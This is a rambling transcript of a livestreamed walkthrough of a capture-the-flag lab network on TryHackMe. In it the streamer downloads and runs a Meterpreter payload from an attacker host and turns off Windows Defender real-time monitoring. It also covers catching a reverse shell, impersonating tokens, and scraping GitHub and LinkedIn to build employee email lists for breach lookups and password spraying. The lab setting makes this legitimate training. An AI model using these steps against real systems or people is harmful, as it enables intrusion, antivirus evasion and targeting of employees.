"Hi team, happy Thursday. Not much on the schedule this week. We're continuing our transition to the new server, so please be patient as we make this transition. To access your usual resources, please go to mail.corporate.local, where you will find our new emailing service, as well as breach.gtfo.local, where you will find our proprietary breach service that all of you are already used to. If you don't already, please add 200.232 to your hosts file in order to access these resources." Yep, mail.corporate.local. Wait, wasn't that the original throwback one? .232 is throwback mail. "As we're auditing our infrastructure, please remember that no personal social media accounts should be connected to company resources such as GitHub. If you need to use Twitter to make company announcements, please use the TBH Security Twitter." Let's go to Twitter, boys, on stream. Here we go, OPSEC. Official Twitter account for Throwback Hack Security. Damn. We did it. This is called "server update", by the way: server update.txt. Good, good. Yeah, like and retweet. I would so retweet it. They probably wouldn't appreciate that. Flag on Twitter, this guy. Let's save that real quick. Let's get to our flag dump over here. Do 21, just to copy this so we've got it.

And we need the user flag and root flag. So before I go crazy, we've got to get to our desktop. A lot going on, sorry. This looks like insanity. All right, root flag, that's 17. Now let's go find us a user. Please, please, please, spooks, you've got to be the only other one. What is happening? Anything on that desktop? Nothing. Is he in Public?
We could just use the usual Get-ChildItem -Recurse, and we will look where the name is equal to user.txt. See if we got anything that comes through. mercerh had it, okay. I thought he was, I guess, a local admin, but you know what, beggars can't be choosers, and I am begging at this point. So, "you were in it." Oh yeah, I'm sorry. Did I miss 16 as an answer? Oh no. Oh, that's that. Okay, I was like, why aren't my numbers adding up? Why aren't they in a regular human sequence? What's the flag on GitHub? Let's go to github.com/tbhsecurity. Nope, that's not it. "Submit the flag, though." Did I submit the flag? Did I not submit the flag? I didn't. Thank you, thank you. I don't know how the heck you guys tolerate me. Thanks, thanks, thanks. "Please remember that no personal social media accounts should be connected to company resources. Don't be afraid to email me." Okay.

Let's get back to our reading and resume progress. We're almost at the end, guys, holy cow. Okay. "Now that you've moved on to a new site by crossing the forest trust boundary, your team needs to perform initial reconnaissance again. This time the OSINT and passive recon is up to you. Go through Throwback Hack Security's online presence; see what information you can gather about the company to move on to gaining access to the rest of their network. GitHub often has tons of juicy information that is up for grabs at any given time. Sensitive data such as API keys or valid credentials are left in the previous commits, which can be viewed by just about anyone. The example photo below is found on the type of writing, just for searching for 'remove password' in GitHub and filtering by commits. Google dorking can often lead to some great results that might help you find company GitHub repositories, employees or more." Yep. "Once you find the user you want to target, you may also want to investigate the GitHub API to see if you can't find any of their sensitive information, such as company
email addresses. And you can check the user's public events history by visiting the following URL. Below is the sample result for Linus Torvalds." Nice. Okay. "Now that you know the fundamentals of gathering information from GitHub, utilize your newfound resource to find data leaks from Throwback Hacks." Hey, hello everyone that is saying hello to me. Hello, thanks for coming to hang out. We got MercerH as a boy for us. Who else we got? That's it. So, uh, GitHub, hawn's, Mercer. Throwback, what user has a GitHub account? Are there other users? Oh goodness, there are. They just don't have... Okay, so now we've got some corp users. Sorry, John. Yeah, you have to pipe the Google dork results into Excel. Don't you dare. Oh god, this sucks. How do I get all these onto a new line? Find all, Ctrl-X, paste. Okay, that actually wasn't that bad. corp_usernames. Google dorks are pretty neat, I will give you that. Um, I want to know more about all of these. Does this give me the full name? Yeah, it does: Grace Brand. Grace Brand, GitHub. Uh, this is uncharted territory here, I gotta be careful. You know, Google dorks are pretty neat, John, especially if you know the company name: throwback site:github.com, Throwback Hacks, Dark Star, uh, Horschark. Excuse me, I saw Rika Fox. I do remember her. Is she on here? No. Whatever. Nope, no, no, no. I want Rika Fox. What was the user found on GitHub? Um, let me try and save this flag first real quick. Thanks for the incessant nudge, Jaximus. Let's get back to four over here, and GitHub flag, 18. Yep, and submit the flag. Good. So now we do have this thing, and we can search for, yeah, "password" in this repository. That's it. She also has a RikaFox repository: "If you found me you're on the right track." Thanks. These are the only repositories that she has. There are nine commits: login.php, upload.php, database connect. That might have a password. Yeah, DaviesJ. Is it really him, though?
Like, I feel like we found that previously. I guess it is finding credentials on the GitHub, and I should note this. What else do we need in there? "What machine can you access with the credentials?" Um, should we do like some CrackMapExec? Or I thought we'd already done this earlier. Is that going to bring me into CORP-ADT? It is? That's good to know. Question is, what is CORP-ADT? What was the, uh, Get-DNS request? PowerShell, get reverse DNS record, is that just it? We did this moments ago, and it's lookup. No, I need to get the hostname. We did this earlier and I totally forget it now. Resolve-DnsName, is that in here? That is a thing, isn't it? That probably needs me to fill in a value, and I probably just broke the shell with that. F. Exit. Literally anything. Please subscribe. F in the chat. All right, yeah, exiting that shell. Resolve-DnsName CORP-ADT01. Double F's. Yeah, I guess nslookup would actually do that, you're right. I'm sorry, I'm being an idiot. I don't know why I would have bothered. nslookup CORP-ADT01. I didn't need to do a reverse thing, I just need to get the actual address. Will that work? How about my xfreerdp jam? I guess the DNS server should be ourselves, shouldn't it? Or, here, I, this is a me on the, uh, oh, that's true, ping should totally work if it's actually a thing. What's happening? What? Will you guys need an ASMR stream? Yeah. Uh, uh, that still didn't have any output. You just tweaked out. Why? Okay. Evil-WinRM is just broken. How's, uh, how's DC1 looking? Let's interact with session six. Let's spawn a regular shell. Let's nslookup, please, CORP-ADT01 on the original domain controller. Well, I guess we can do our xfreerdp again.
We did, um, user. We need to proxychains this, right? We need to proxychains into, uh, MercerH. Yeah, I should put it on corp, honestly, just to have it, and have a shell that isn't garbage. /p Pikachu7 on /v 10.200.24.118. Yeah, I totally trust the certificate, absolutely, you know me. Okay, uh, that might just come in handy. And actually I guess I can interact with a regular shell there too and not hate my life more than I already do here. Let's nslookup with 10.200.24.117, as you suggested, and then try that CORP-ADT01. Well, that work? We get anything? Do we have a shell? Holy cow, you don't know the address. I mean, that makes sense. We should probably have specified 18. Or is it the other way around? Is server last? Should we be doing CORP-ADT and then our DNS server that we want to specify? I just, uh, I don't remember all that off the top of my head. Is that 10.200.24.118? It's probably just gonna keep hanging. Oh, no, it's not, it's definitely the other way. If we could just use nslookup and, like, set it, maybe we could see the computer. Just use ping, that's a good call. Why does that happen? Apparently ping is not the command to run, because it will kill your shell. Yeah, probably a firewall thing, who knows. We should be able to see it. No, you're good, no, you're good, I'm having fun. It's got to be in our DNS entry, so might as well just look. CORP-ADT.local is .243. That took longer than it needed to. Watchdog Mental, thanks so much. Excellent. I really appreciate you checking out the video. I hope you've been enjoying all the fun, agonizing pain that I've been going through. So CORP-ADT01 is 10.200.24.243, and we can use the above credentials to log in. Awesome. Thanks, Penham. I really appreciate you guys hanging out. I know, like, wow, six hours is a lot to deal with. So, uh, I was like, I don't know why people would want to. Thank you, I appreciate the fix right now. We're at hour five for today's stream.
So DaviesJ, proxychains. Yeah, I, uh, I'm EST, I'm Eastern Standard Time, so it's one in the morning right now. But it says this is the second Monster of the night, so. Mmm, SSH is not having a good time. Let's do our Evil-WinRM -i this bad boy and then -u. Oh, am I really almost done? Like, this feels kind of crazy. DaviesJ, right. Yeah, and his password should be Management2018. Please work. Please give me something. Wait one gosh darn second. Do I need a new route on the corp domain controller? Because right now I'm still only proxying through the Throwback DC. That got me into corp's domain controller, but I need to be able to see everything else, which means that I'm gonna need, yeah, yeah, I need a proxychains from the corporate DC. We're having fun. This is fantastic. Well, at the very, very least, let's take advantage of this sweet, sweet RDP session that we have on that new box. So, uh, not-a-shell is still a thing, in which case we can use our wget http://10.50.22.5 port 8000 not-a-shell.exe, and then -O, bring it down, we'll call it met.exe. I think I have a comma there, that was an accident. It grabbed it. Maybe. It pulled it down. What just happened? No. No antivirus. You know what? You know what we can do, we can use our mshta server. Ha ha ha ha, we're smarter than that. We've got our little macros command here, which can mshta over to this IP address, which should still be running if I take a look at the jobs here. I've got that mshta server still kicking, so let's put our hands together and pray that this actually works. I'm going to drop, yeah. Oh, yeah, we actually literally turned off antivirus earlier, so I should have saved that command. Stop. Stop copying a space character. No, no worries, we totally could just turn off antivirus, and it was really cool when we did it earlier. Paste. Do the thing, delivering payload. Will you get that server? Will you get that shell? Uh, should I have started a listener?
use multi/handler, set payload windows/meterpreter/reverse_tcp, set LHOST tun0, set LPORT, 4141 is what we chose. Oh, that's still kicking. So when I ran that earlier, did it not send it? Yeah. Oh, okay. It still triggers antivirus. Let's turn that off. What was the stinking command that we ran earlier? Set-Mp... Uh, shoot, I'm trying to tab complete here, but PowerShell's getting messed up. Yeah, Set-MpPreference, uh, real-time, Set-MpPreference real-time monitoring. Oh, no, no, no, no, it was Set-MpPreference and then -DisableRealtimeMonitoring $true. Those are arguments, right? Sorry, frantic alt-tab. On 18, Set-MpPreference real-time monitoring, that's -DisableRealtimeMonitoring set to $true. I should really amp up this text here, I'm sorry, I hope you guys can see that. Okay, I don't have permission. Excuse me. Run this as administrator, please. Then let's invoke PowerShell and let's set... let's make this a little bit bigger, sorry, so you can see this wonderful, powerful command, apparently. Now I want to cd C:\Users, dir, and we were in MercerH earlier when we downloaded this thing, didn't we? Do we have to wget it again? 10.50.22.5:8000 not-a-shell.exe. I cannot see what I'm typing. met.exe. Okay, now it exists. And I don't know if the execution policy would have affected the antivirus, because Windows Defender is what was triggering on this binary. I need a .\met.exe. Please. Oh shoot, I needed to start that listener: set LPORT 4141, run. There we go, there we go. Okay, awesome. Okay, so now we're on .118. We need to proxy one more time, so if I background and I use autoroute, what do we've got?
We can set our command to print to see what sessions we have routes set on. Right now it's set to six, which is the original Throwback domain controller, but now we're going to move it over to the corporate one, so that should be set to session seven. But we have to go ahead and remove the one that we have, so let's set the command to delete. And that's fine. Now we can run that to delete it. So the command to print, just for a sanity check: currently no routes set. So let's set our session to seven and set the command to autoadd, so that when I run this, now I have a new session for him, which means I can now proxychains Evil-WinRM over to Davies, and his password needs to be Management2018. Got it, sweet. "Missed a lot. How did you get domain admin?" Uh, we found the backup account that had DCSync rights, and that was able to dump all the credentials on the domain controller, and we found the local administrator hash that had a decent password that we could crack. "Uh, nice. How did you get the memo about backup?" I think there were some files back, uh, some time ago that kind of turned us on to it. Yeah, backup account and then magic, we just kind of said hocus pocus and suddenly we rooted everything. I'm kidding, I'm teasing. Identity theft is not a joke. Oh, we're gonna do some impersonation stuff now. Okay. "Now that you have your foothold onto CORP-ADT01, your team has suggested escalating privileges by enumerating privileges, looking for tokens on the system. Similar to web cookies, tokens are temporary keys." All right, we got to get Meterpreter on this guy now. Whoo, we're having fun, we're having fun in the sun. Um, let's turn off Windows Defender immediately. Actually, am I in... am I local admin? net user. What? net user. whoami. Do I not have an account on here? What the... what? Did the stream die? What's up, everybody? Can you hear me? Okay. Are we back? Are we back in action? I don't even know what happened there. Sweet, sweet.
I'm glad everyone's still with me. Thanks so much for hanging out, you guys are fantastic. I looked over at OBS and, like, the streaming icon was not on anymore, but it was still recording. I'm like, what just happened, why did this one die? So you didn't miss anything, you literally didn't. I didn't do anything, I just saw your thing and I was like, uh, the stream is suddenly off, not good. So now we're gonna count three streams, this counts as an extra stream. Whatever. Do I have permission to turn off Windows Defender currently? I can run scripts, which is cool. Can I Set-MpPreference to, uh, -DisableRealtimeMonitoring $true? I can, okay, fantastic. So with that, let's go ahead and download our little not-a-shell shell. Uh, that is 10.50.22.5 on port 8000, not-a-shell.exe, and we'll save it as met.exe. Cool. Now that's downloaded and I can see met.exe is present. So if I were to .\met.exe... let me go back and actually make sure that I'm gonna listen. So let me use multi/handler, uh, I'll show options one last time to make sure everything is still set. Looks good. Let's run that listener, fire it off, and there we go, got one more Meterpreter session on .243. So I don't know what session I'm in right now, because two of them popped, so let me interact strictly with eight. And, excuse me, sessions with an s, plural. Incredible. Now I could use the incognito module and see what tokens are available to me. There is a room in this... there is, I think, some post-exploitation stuff that TryHackMe showcases for this sort of thing, but this will be kind of a cool little exercise to play with it. So let's load incognito and then let's try and list_tokens. It looks like I can specify by username, so I'll use list_tokens -u. I'm not currently running as SYSTEM, so do I need to be? I don't think so. It says, now that you have a foothold.
You're good. "After getting a Meterpreter shell on the target, you could just load it and try to impersonate some tokens." Do we have anything interesting? We could impersonate this individual. All right, so if we have that impersonation token, we could impersonate with that syntax that I just saw: impersonate_token, and then I'll supply that. Will it do it? "Successfully impersonated user," that user. So am I, like, just that person now? I am. Okay. Incredible. "What is the file in the administrator's Documents folder?" No one told me that I needed to go into that administrator Documents. Sissy, how's it going? My session on the DC died. Okay, great, let's get to C. Oh, yeah, would I just be able to, like, getsystem now with this user? Probably. Incredible. Thanks, thanks, Jaximus. Let's cd to the other, um... where am I right now? Excuse me, I'm okay. I'm bumping around with Throwback. Seriously, where am I right now? Can I get to Users? Yeah, okay. That was weird. Does this not have an Administrator page? Whatever. Um, what's on the desktop right there? root.txt. Heck yeah. Let me just take note of this one real quick. We have so many Sublime Text windows open right now, oh my lord. So, oh, let me put that in the flag submission panel, because we're so close. What is the user flag? We don't have that yet, but we do have the root flag, so that's 20. Let's get 19. I'm just going to take that code real quick. I know, let's go find that. We were in as DaviesJ earlier, so I have a feeling DaviesJ is where we're going to end up finding that user dir, user.txt. All right, awesome, user.txt. Whoa, whoa, try to copy-paste. All right, okay. Now I need to actually see the file in the administrator's Documents folder. Okay, so we know that the administrator was Dossier, Dossier, okay. Great, and they said the Documents folder.
So let me hop in there, and I see an email update. Let's check that out. Nice. I am going to steal this very, very quickly: email update.txt on CORP-ADT01. Cool. email_update.txt. "Who wrote the email?" It was Karen Dossier. "What is her official title in the company?" She is the Human Relations Consultant. And submit the flags. Done and done. Okay, let me actually read that email before I just steamroll right over it. "Hey team, hope you guys are having a good day. As all of you are probably aware, we are now transferring to our new email service. As we transition, please get the new emails provided to you, as well as the default credentials that can be found within your emails." Oh. "Please do not get these emails outside of the corporate, as they contain sensitive information. The new email format is based on what department you're in." Okay. "In order to access your email, you need to go to mail.corporate.local as we get our servers moved over. If you do not already have mail.corporate.local in your hosts file, please do that. Feel free to email me with any questions." Oh, gotcha. So this is the structure of their email, with their name and the department. We have a decent listing of some of the potential departments there. So, okay. Hello, friends that are joining now. I appreciate you coming to hang out. I realized we dumped into a, uh, we jumped into an extra stream, because the other one kind of crashed on me for some reason. So, from the email on CORP-ADT01, we know that we have corporate emails being moved to a new email format. Yeah, dude, Jaximus, we can absolutely finish this today. How many we got left? Three. Oh, let's do it. It's only one, it's only one in the morning. Oh, thank you.
Yeah, I can never remember where the hosts file is on Windows either. "Using LinkedIn along with LeadLinked, we can pull names and emails from LinkedIn to format with namely and insert into Breach or GTFO." Okay. "OSINT with LinkedIn, overview: LinkedIn, since its creation, has represented an incredibly valuable vector for information gathering. After all, who would have imagined that people would just post their company structure, job overview, and work history publicly online if we just ask them kindly? When I personally perform recon (Dark Star), I typically visit LinkedIn through my second stage of OSINT, typically following the initial automated phase where I gather any emails that are publicly available. Once that is done, we know the format our target uses for email. We can journey on to LinkedIn and scrape names to expand our email list. We'll dive into this further with LeadLinked." Uh, sorry, Jaximus, this is saying I didn't add the stuff to /etc/hosts and check them out, so this is why it's not clear what you're currently doing. Uh, what session died? Oh, the DC again, whatever. What? The mail server is .232, isn't it? They specified that earlier. We saw the previous email, so I guess I'm confused what extra, what new email server there is. There are two websites? Oh, it's a virtual host. I follow. Uh, thank you. Okay, what would you guys... see that, Georgia? Incredible. sudo nano /etc/hosts, so .242 or .213? What was that? What was the original? 232. 232 should be mail.corporate.local. Corporate. Okay. So let's go to that with our SOCKS proxy, and we need to ideally have credentials. Did we see credentials already? You say there is another website. I'm very confused. Breach thingy. Oh, oh, oh, oh, oh, oh. Oh, you're right, you're right, you're right.
I'm sorry, I follow. breach.gtfo.local. I follow. Okay, I guess I completely missed that that was a virtual host routing thing. I should go to breach.gtfo.local. Nice. Okay, thank you. Did I have credentials that I'm completely overlooking as well? Maybe not. I think that's why I need to, uh... "Corporate emails are moving to an email format. We also know that we have a proprietary breached credential service that we utilize to find credentials in the network." Gotcha. "LeadLinked is a tool developed by Spooky and Horschark to automate discovery of company employees' LinkedIn accounts by discovering all the employees an organization has. This can be incredibly useful for password spraying, phishing, or any other targeted attack. Built in, it has a feature to generate emails based off of a given format, which you can use to password spray, phish, or look up emails on the data breach. The optional -p flag, if you like, utilizes Have I Been Pwned's API to query each email and enumerate which data breaches the victim has been a part of. The output is stored within a spreadsheet that can be easily converted into a table and sorted and organized." Okay. Let's go grab that tool, if that's where all the cool kids are going. Whoa. cd /opt, git clone, cd LeadLinked. Hello. That's a capital LeadLinked. And let's install everything that this requires. "Pulling info from LinkedIn with LeadLinked. LeadLinked is a LinkedIn recon tool utilized for finding employees at a company using search engines like Google and Bing. If you have a Have I Been Pwned API key, it can also tell you what data breaches the user has been involved with, with a separate section for specific password data breaches." That's cool. "It also does it with DeHashed." Ooh. "Using the tool is easy. There are several required arguments, though: -e for the email domain, for example gmail.com." So in our case, we're going to be using tbhsecurity.com. So if I were to just run python3 LeadLinked, does it run? Okay, it does. Great.
So -e, email domain, tbhsecurity.com. Um, and what else did we need here? -f, which serves the email format. Email format, oh, and there's an example of what those look like here. So let me do a little -h. "Generates emails based on various formats: 1 = jsmith, 2 = john smith," et cetera, et cetera, et cetera. We know that the format is going to look like first initial, last name, so that would be 1. Okay, so -e tbhsecurity, -f 1. Um, we also need the company name, so I guess Throwback Hacks. "Timeout for searching," it has a default. "Jitter," has a default. "Safe: only parse names with company title, reduces false positives." I'm not worried about that right now. -p requires that API key. I think that's all we need. "Lastly, a positional argument of the company name you're trying to search for is required." Okay, so we're doing that. Probably just fine. Let's do it. LeadLinked. Okay, I guess that just happened, then. We'll now list this thing and see if that got anything. Was it gonna output anything else, or is it just... got, oh, okay. Okay, no, it just got a lot of stuff. And slick, dude, that was rapid-fire fast. Are you sure you didn't just cache that? Is that hard-coded in? If you give it these specific arguments it spits out this stuff. Dang, yeah, I guess we're doing more Excel. Really? Wow, okay. Yeah, this is a lot. That's okay, though. Looks like we've got a lot to work with. I like the force lowercase, that makes me feel pretty leet. Sweet. Oh, there are only three employees on LinkedIn? What happened? I mean, realistically, these are the only ones that we kind of like saw earlier, didn't we? Should I remove those? Should I do those false positives?
Let's use -s. Before I do that, let's copy that Throwback one to original.xls, and then let's run it with that -s argument. Oh, Jaximus is throwing the LinkedIn, uh, company here in the link. I have a crap ton of messages, sorry. If you guys ever wanted to know how often people message me, it's, uh, a lot. There's gotta be a LinkedIn flag. Holy cow, it's Dark Star. Yo. We're not dead yet. Oh, that was hilarious. Holy cow, I can't believe you guys are all still here. You must really like this stuff, huh? Yeah, Firefox, I know you're having trouble getting my pages back. Yeah, maybe we should have stopped that Windows VM that was running in the background. We still here? We're still hanging out. Let's, uh, let's get back to TryHackMe, huh? Oh, we probably need a SOCKS server. Oh god, we gotta go back and do all that all over again. How did I forget, huh? How did I forget? What do you think, should we finish this thing? What all do we have left? Realistically, we probably have to get everything back again. Uh, yeah, yeah, good. I'm glad everyone had some time to update their LinkedIn account. Go ahead and send me a LinkedIn request if you want. Um, um, let's connect to the VPN again. So, uh, for those of you that might have been watching the video, or are just now catching up, my machine crashed. It's really funny, it was me opening up the Throwback Security, uh, it was me looking at their LinkedIn company page, and as soon as I opened up Dark Star's page my machine dies. So I could move my mouse, and I could, uh, move my mouse, but that was about it. I saw, um, like my face just fade out to gray over on the OBS screen. I'm like, oh no. So we've got LeadLinked over here, and we've got our Throwback script stuff. Did we create a copy, or did we move the other one? Because when I ran it with -s for safe... Uh, don't bother recovering stuff. Yeah, okay, cool. This only found three, so these must be the only real ones that we found.
Yeah, the video will definitely be uploaded to YouTube. It'll take me like forever to render all this, but that's totally fine. So we'll deal. If you guys want to catch this video after the fact, you can absolutely see it, uh, on YouTube. All right, next section is Lost and Found. "Now that we have a list of emails from LinkedIn, we can format them into a custom wordlist with the email format we got from CORP-ADT01 and put them into a breach credential service, in this case Throwback's internal breach credential server." Slick. So, "Introduction to data breaches: at the time of writing, Have I Been Pwned is a ginormous collection, with a collection of over 10 billion breached user accounts as well as 473 total breached websites. This is an alarmingly high number, but can offer a lot to an attacker looking to get an easy win. Data breaches can confirm many things, not just if the user has been hacked, but it also confirms that an email account actually exists. This is arguably more valuable than a password. You can use this information in combination with phishing to gain some really easy wins within an organization. For this next exercise, we have set up a breach credential lookup service called Breach or GTFO, a fake service within the network that is modeled after DeHashed, a paid breach credential service." So we'll be using namely. "namely is a template-based email wordlist generation tool that can also be used for domain user wordlists, developed by orial. It takes the namelist and a domain name, or multiple domain names, and generates a wordlist around the two of them. namely can also take custom template keys in order to customize the wordlist to your needs." All right, let's go ahead and grab namely. Uh, I don't need to sudo git clone. What the what? Why is that a sudo? That's weird to me. Why is everything sudo? "Insert the names that should be formatted, by example." Okay. Um, we do have a Breach GTFO, right?
Yeah, breach.gtfo.local, that's still a page we could use. Um, and we should put together a list of what we were looking at. So throwback_scraped has Rika Fox, Summer Winters, and John Stewart. This page suggests we create a names.txt, and they should be formatted just like that. So, okay, let me hop back to a proper directory in ctf/tryhackme/throwback, and subl tbhsecurity_names.txt. And I apparently no longer have in my clipboard the names that I wanted to have. Totally fine. Yeah, I don't care about your recovery stuff. Let's just grab these, slap them in: Rika, Summer, John. And I don't need these tabs here. Okay, that's kind of it. It looks super duper simple, and that's all. Okay. Then they use namely with the names that we created, domain of throwbacksecurity.com, and using the template format that you can specify, and they're all in hre. We would need to do that, I feel like, a couple more times, because we aren't positive what, uh, department they might be in. This is... we could try it. "But to generate more complex user wordlists we can use -tf to specify a template file." Oh, no, and then they mentioned the /etc/hosts. Maybe this should be a little bit earlier, I don't know. "So in Breach or GTFO you can enter the email address of the user." Oh, and this is absolutely... how can I read... how can I still access this? I'm Ctrl-F-ing right now, I'm hard Ctrl-F5-ing. What the heck, isn't that an internal thing that I'm supposed to be... what? Oh. Oh, you're right. That's just an IP address, you're totally right. I'm sorry, I thought... I was really freaked out. I was like, did I need to be pivoted? Like, how is that working? No, that's just the regular .232 thing, I think, that we saw earlier, or whichever, .213, whatever, whatever one it was. So you could specify emails. "What is the user's email who has been affected by the data breach? What is the user's password?"
Well, we don't have a lot of options in this case, so let's go ahead and make those names here and, uh, work with it. Let's do it. So, in the directory where we have put our names, we can run /opt/namely. Name... did I not get that thing? Where did I put this? Oh, I put namely in my LeadLinked directory, that's funny. So now let's run /opt/namely at that location with the tbhsecurity_names.txt; the domain name is tbhsecurity, and it will generate those with hre. Uh, there were other sections, though, so emails.txt. Yeah, I feel like I want to change that to also include esm, fin, and all those other ones. We could run it one more time if we really, really wanted to, but let's just take all this and put it there with the different values. Um, we need fin for finance and it, probably like IT security, and then sec, maybe that's security. Okay, done and done. Now we have all those, and I guess we could just try these on the web page. I guess we could kind of do this manually if we really, really wanted to. It looks like that's kind of what they expected, so we'll slap that in. Nothing for him. Yeah, honestly, you didn't exactly need a Python script for that thing. S. Winters, that's fine. How about J. Steward? Can we get Dark Star? No. Do, uh, we ever actually find a... do we find a breach at some point? Realistically, this is the thing we could probably have a Python script for. I'm just going to be like rapid-fire Ctrl-C, Ctrl-V, alt-tabbing around. What was that? Which one was that? Yeah, we could just probably use wfuzz. And that's a pretty good point, it's literally a, uh, it's literally an HTTP GET variable. So, what the f? Okay, the very, very last one that I got. Totally fine. We got it. So sec jsteward is the one, slap that guy in there. "User's password" is that. "What credentials could be found?" What? J. Steward and that, right? What? Uh, what could be... oh, oh, oh, oh, oh, I need to go into his email now. Is that right? Yeah, yeah, yeah.
I follow, I follow. mail.corporate.local, and he is that, sec jsteward there. Do I need the user? I mean, I guess, yeah, it's just his username, not the email address. Do I need to be proxied for this thing to work or something? Because I'm not getting a response right now. "I need the sec thingy." What the hell's... what do you mean, the sec thingy? Oh, oh, oh, oh. sec jsteward is his username. What, you fools, I understand, I got you. But do I need their full email address? Yeah. I thought I wouldn't need that. Please. There we go. We got BoJack Horseman in here. Wow. Wait, let me steal this email real quick. This has, uh... this has really devolved, like, you could see me just slapping files into my directory. TV sec guest, and welcome TV sec. Cool. "Submit recon flags here." Alrighty. There were some LinkedIn flags that I needed to get that I didn't earlier: corporate mail server. There's a flag on LinkedIn, linkedin.com. Was it company TBH Security? Was there a hyphen in there? Yeah, maybe TBH-Security. Yeah, Throwback Hacks. Thanks, thanks. Thank you, I appreciate you, chat. Well, even that doesn't seem right. Is it just a plus? That's it. Thanks. The time of the machine. Yeah, no worries, no worries, we're good. There is, there... where might there be a flag in here? It's got to be on there, folks. There it is. Can I send a friend request to all these people? Time for my computer to crash by simply opening LinkedIn, apparently. I'm sending you a request. We're gonna be friends. Just don't go to Dark Star's. Yeah, I switched over to the tab and so far I'm okay. Um, flag on LinkedIn. We got to close out some of these tabs, dude, this is going crazy. Okay, let's get back to the original README in ctf/tryhackme/throwback. I don't need this cool Chrome anymore. That was flag on LinkedIn, which is number 22. There we go. "What is the flag in the source code of Breach or GTFO?" Did I not see a flag there earlier? Or did I even look at that?
Some weirdness going on with the formatting there. What is that? Is that because of this thing? Yeah. Whatever. breach.gtfo.local, is there a TBH? Should it have been when I found the J. Steward account, sec jsteward@tbhsecurity.com? Is that the one that has a... now that's loading. What, the network? Yeah, network probably decided to call it. Yeah, yep, it didn't do it. Good call. The network said no more. Well, this is good, I don't feel so bad, because I know I'm gonna have to re... uh, yeah, now we can kick back. I know I'm gonna have to reconnect to literally everything. Oh, I'm really excited to get that certificate, it'll be kind of fun. Submit flags. Was there another one that I needed over in part four? Yeah, honestly, if we just get the handler ready, that's a good call. use exploit, I don't even need to type exploit, multi/handler, and then we will set LHOST to be tun0. We are connected to it? Yes, we are. Okay. set LPORT, it was 4141, set payload windows/meterpreter/reverse_tcp, run. Let's see if we'll get no callbacks. What other flags do we need to supply? Oh, we need the source code once Breach or GTFO comes back. It might be a little bit. And network is running, right? And network is running. Can I ping production? I cannot ping production. Does it still need time? Probably. Okay, good. I wanted to make sure I didn't have, like, any duplicate VPN connections or anything crazy wonky. I want to be able to see that come through. Machine just not on at the moment. Network uptime: two minutes. Yeah, I guess we can just kind of keep waiting. Yeah, yeah, give it five minutes for sure. Uh, I will use this opportunity to take a quick break. I really appreciate all you guys that are still sticking with me, because we're so, so close to the end right now, and, uh, it'll be kind of cool to wrap it all up. Give me just a quick, quick second. What should we do for our "be right back"?
What should we do? We could do... you see, cmatrix? I feel like cmatrix is a little bit too easy. We could do a lolcat. Oh, we don't even have lolcat installed. Oh, dude, thanks. Jaximus is absolutely... I think, yeah, I think we're gonna be done with this pretty soon. So thanks so much for hanging out, thanks so much for all your help. This has been a lot of fun for me. I hope you were comfortable chilling, hanging out. Thanks, Narf. Yeah, I understood, I understood what you meant now. I am weirded out that it still isn't getting any responses. Yeah, should I just bounce that OpenVPN? "Yeah, more came to help pretty soon." I think so, especially if we're getting into the fun of Twitch. I'm really grateful that you guys are all wanting to hang out, and I like that we can kind of be cool and casual. Yeah, I mean, I feel like it just wouldn't respond. We should still be able to see something, wouldn't we? What's the firewall? What's that pfSense box? He should respond, right? .138. "Try the breach website." WTF. Right, come on. Alrighty. I said I would take a break. Um, give me just a second to go take a break. Stand by. Sorry. Just as you come in: hey, hi, I'm gonna take a quick break, sorry, one sec. Yo. Jumping back in. Let's try to finish this up. Was it 1... .138? It's a firewall. Seriously, nothing is responding currently. The network's been up for a while now, but it's not currently seeing anything, and this is weirding me out. Try the breach one more time, you think? "Bro, shouldn't you be teaching?" "Why are you trying to go to HTTPS?" Yeah. Well, see, now it's just trying to load. You gave... I gave him a task, don't worry. All right, HTTP. HTTP is still not doing it. That was just cached. Something's funky. I don't mean for us to trip over this like last piece. This is really upsetting. I'm really sorry, like we're so close to the end. What is going on? Should I, like, regenerate my VPN certificate?
I feel like that's kind of all I got left right now. It's running multiple VPN sessions. I can do another pkill. I got no extra devices. Yeah, man, I'm gonna regenerate that cert, honestly, that certificate, because I'm weirded out that I'm not getting anything right now when I know that I should. Give me just a quick sec. It thinks I'm connected. Yeah, so it's going HTTP. Oh, did it go back? What the heck? Let me just try and curl this thing. Nothing. It should be able to reach that, so I'm worried. If I have to regenerate my certificate, it's gonna give me like a whole other IP address, though, and then none of my callbacks will work and I'll have to redo everything. Should I restart the network? Because it says I'm connected. I'll just bounce it, I guess. Why did two people have to vote? It's my network. "I have to wait another hour." Oh, really? I did not know that. Okay. "Try the firewall to see if it's up, 10...224.138." Not that. Still nothing. It's way broke right now. I way broke it. I'm bummed. "Ask a mod on the Discord." I don't know if any mods are gonna be awake right now. "Your ping said no route to host. Maybe netstat -rn to see your routes." Should I... I don't know if I want to bug... netstat -rn. Oh, I have two. No, that's fine. What's the "ooh" for? Are you freaking out about my Discord? Are you freaking out about the routes? Am I stepping over something? No, no. Yeah, it seems fine. I can ping the gateway. Super lame. Smokeme's responding. Cool name. Yeah. Firewall went RIP. .224.138, nothing from the firewall. Smokeme's going. Smokeme, a mod. Oh goodness, I appreciate the assist. I see Skiddy online, but yeah, I don't want to bug him. He's king, dude. He's got his crown. Am I getting pings right now? I am. The Smokeme. Excellent. What are the odds, if I regenerate my cert, my VPN connection, what are the odds that it completely kills my IP address?
I don't know if that'll do it. Restart any kind of network services. "You add zero nine fours" typing... Oh, I follow. "Can we join the same room and I'll vote to reset it?" Yeah, whoever of you is in Throwback, please help. Please help. For those of you poor souls that are watching the video on YouTube, and I'm speaking this in the future or so, if you ever do see this, I'm truly sorry. Skip ahead. I'm so close to the end. Oh yeah, can someone go back and add all the timestamps of this bad boy? That'd be incredible. Literally the last task. Oh, wow. Thanks so much. My name is in here. Thank you. That's kind of surreal. I'm really grateful. My beta testing was connecting to the VPN and seeing if it worked, and it worked then. Oh shoot, we're gonna do Rubeus and Starkiller crap. I gotta rebuild all that. This picture makes me uncomfortable, by the way. I know what he's doing. Yeah, everything always works in development, not in production. "Orpheus bumped a ping to Skiddy." Oh. Yo. Help us reach the finish line. That's so funny. Yeah, remember how I told you to keep them on a separate terminal and have it open? Yep, and then my computer crashed. Wait, non-Skiddy, or if you're like, "I ain't scared." I feel so bad, like I just am scrolling aimlessly and I have nothing to do. This is really crippling, I'm not gonna lie. "Jump on cough while we're waiting." "Restart your PC so you can have your sixth stream." Oh shoot. Yeah, we could take a look at... hanging out stream. I appreciate you guys. We're almost done with the 